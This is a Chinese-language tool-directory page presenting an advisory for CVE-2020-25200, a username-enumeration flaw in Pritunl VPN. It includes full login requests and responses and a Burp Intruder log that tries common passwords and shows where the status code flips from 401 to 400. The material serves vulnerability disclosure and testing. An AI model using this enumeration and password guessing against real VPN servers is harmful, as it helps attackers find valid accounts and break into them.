Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
pritunl-CVE-2020-25200 — 针对CVE-2020-25200的漏洞利用:通过分析重复登录尝试后的HTTP响应码变化,枚举有效的Pritunl VPN用户名。 | Kitploit
工具/GitHubGitHub/lukaszstu/pritunl-cve-2020-25200
侦察漏洞分析信息收集Web安全渗透测试身份验证
GitHublukaszstu/pritunl-cve-2020-25200

pritunl-CVE-2020-25200

针对CVE-2020-25200的漏洞利用:通过分析重复登录尝试后的HTTP响应码变化,枚举有效的Pritunl VPN用户名。

查看仓库
4116年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-25200

Pritunl VPN 服务器 - 受影响版本: Pritunl v1.29.2145.25 553bbd

=========================

Pritunl 1.29.2145.25 允许攻击者通过一系列 /auth/session 登录尝试来枚举有效的 VPN 用户名。最初,服务器将返回 401 错误。但是,如果用户名有效,则在 20 次登录尝试后,服务器将开始返回 400 错误。无效的用户名将无限期地收到 401 错误。

=========================

要利用此漏洞,攻击者需要开始使用相同的用户名重复暴力破解登录。最初,服务器将返回 401 错误,但经过 20 次尝试后,如果用户名有效,服务器将开始返回 400 错误。如果用户名无效,服务器将无限期地返回 401 错误。因此,可以通过收到 400 错误来验证用户名是否存在。

=========================

针对有效用户名(经过 20 次尝试后)的 HTTP 请求和响应:

POST /auth/session HTTP/1.1 Host: 192.168.1.18 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 40 Origin: https://192.168.1.18 Connection: close Referer: https://192.168.1.18/login

{"username":"pritunl","password":"paul"}

HTTP/1.1 400 Bad Request Cache-Control: no-cache, no-store, must-revalidate Content-Length: 76 Content-Type: application/json Date: Thu, 03 Sep 2020 22:42:39 GMT Expires: 0 Pragma: no-cache Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Connection: close

{"error_msg": "Too many authentication attempts.", "error": "auth_too_many"}

=========================

针对无效用户名(经过 20 次尝试后)的 HTTP 请求和响应:

POST /auth/session HTTP/1.1 Host: 192.168.1.18 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 39 Origin: https://192.168.1.18 Connection: close Referer: https://192.168.1.18/login

{"username":"admin","password":"scott"}

HTTP/1.1 401 Unauthorized Cache-Control: no-cache, no-store, must-revalidate Content-Length: 83 Content-Type: application/json Date: Thu, 03 Sep 2020 22:42:43 GMT Expires: 0 Pragma: no-cache Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Connection: close

{"error_msg": "Authentication credentials are not valid.", "error": "auth_invalid"}

========================= Burp Intruder 日志:

0 401 false false 370 1 123456 401 false false 370 2 password 401 false false 370 3 12345678 401 false false 370 4 qwerty 401 false false 370 5 123456789 401 false false 370 6 12345 401 false false 370 7 1234 401 false false 370 8 111111 401 false false 370 9 1234567 401 false false 370 10 dragon 401 false false 370 11 123123 401 false false 370 12 baseball 401 false false 370 13 abc123 401 false false 370 14 football 401 false false 370 15 monkey 401 false false 370 16 letmein 401 false false 370 17 696969 401 false false 370 18 shadow 401 false false 370 19 master 401 false false 370 20 666666 400 false false 362 <-------------- 长度和响应码的变化 21 qwertyuiop 400 false false 362 22 123321 400 false false 362 23 mustang 400 false false 362 24 1234567890 400 false false 362 25 michael 400 false false 362 26 654321 400 false false 362 27 pussy 400 false false 362 28 superman 400 false false 362 29 1qaz2wsx 400 false false 362 30 7777777 400 false false 362 31 xxxxx 400 false false 362 32 121212 400 false false 362 33 000000 400 false false 362 34 qazwsx 400 false false 362 35 123qwe 400 false false 362 36 killer 400 false false 362 37 trustno1 400 false false 362 38 jordan 400 false false 362 39 jennifer 400 false false 362 40 zxcvbnm 400 false false 362 41 asdfgh 400 false false 362 42 hunter 400 false false 362

<>

=========================

安全研究员 - Lukasz Studniarz

下载工具